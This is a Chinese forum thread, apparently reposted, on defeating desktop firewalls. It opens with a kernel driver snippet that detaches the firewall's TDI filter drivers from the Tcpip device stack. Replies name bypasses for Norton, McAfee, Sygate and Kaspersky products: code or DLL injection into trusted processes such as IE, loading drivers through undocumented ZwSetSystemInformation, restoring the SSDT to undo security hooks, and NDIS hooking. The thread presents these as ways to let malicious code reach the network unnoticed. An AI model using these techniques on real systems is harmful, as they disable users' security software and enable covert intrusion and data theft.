TDI过滤驱动摘除

 

趁这次找回IP的机会，决定换一款墙，结果看到了以下的东西：

来点好玩的，其实我们只要写个驱动，从设备栈里把防火墙的TDI过滤驱动给摘除掉，这样就能对付一般的防火墙了。当然，国外强一点的防火墙，比如ZoneAlarm Pro 6.5就得再结合其他方法了，嘿嘿。

摘除过滤驱动的代码片段：

QUOTE:

RtlInitUnicodeString ( &TcpipName, L"//Driver//Tcpip" );

ObReferenceObjectByName( &TcpipName,
        OBJ_CASE_INSENSITIVE,
        NULL,
        0,
        *IoDriverObjectType,
        KernelMode,                  
        NULL,
        &TcpipDrvObj);

CurrentDevice = TcpipDrvObj->DeviceObject;

while(CurrentDevice != NULL )
{
CurrentDevice->AttachedDevice=0;
CurrentDevice = CurrentDevice->NextDevice;
}

这段代码就能足以使国内人人皆知的天网防火墙装了和没装一样... 呵呵

PS:这里的突破指的是软件防火墙的内对外层面。

norton防火强有什么缺点啊，我正在用。

诺顿的防火墙相对而言还是比较弱的。

诺顿的防火墙很好突破，简单的远程线程DLL注入到可信进程既可。用最常用的创建IE进程，然后将恶意DLL注入进IE即可，因为诺顿允许IE访问网络。

另外，诺顿2006防火墙默认的允许自己几个程序访问网络的，虽然诺顿hook 了NtopenProcess，使普通进程获得他句柄时失败从而不可终止他的进程或者注入诺顿本身。我们只需要写个驱动，恢复SSDT就可以搞定这个限制了。

我用的mcafee personal firewall plus 看过评测 这个不是很强 不过功能挺人性化的 呵呵 用着好用就好 反正没有绝对安全的

这个墙也可以轻易突破。注入IE或者Svchost即可

不知Sygate Firewall Pro 5.6有什么弱点?

很好突破。简单点讲，用SetThreadContext的方法不引入DLL实现代码注入，注入到IE等可信进程即可

卡巴的防火墙好突破吗

当然可以，

如果是之前的卡吧反黑客，很好突破，无论是DLL/代码注入到可信进程，还是用我在我主页上写的摘除过滤驱动的方法，或者是NDIS hook,都可以搞定他。

如果是KIS6，因为起包含主动防御模块，你代码注入、写注册表实现自启动以及加载驱动时卡巴6都会报。但照样可以搞定他。 关于早版本的KIS6有个更弱智的BUG，可以见我以前写的文章 http://old.xyzreg.net/lblog/blogview.asp?logID=182 。对于最新版本的KIS6我们可以使用未公开的ZwSetSystemInformation的方法加载驱动，然后自己写个驱动实现恢复SSDT表，这样我们就可以突破卡巴6，恢复SSDT表后你就可以光明正大的代码注入到可信进程访问网络了，恢复SSDT表后你修改注册表等实现自启动卡巴6也没反映了。 另外，从系统底层的层面突破防火墙的话，还可以使用NDIS HOOK的方法。

实际上我们追求的就是一种心理安慰罢了，就像盗贼从不把门锁放到眼里，防火墙也就成了“只芳君子不防小人”的东西。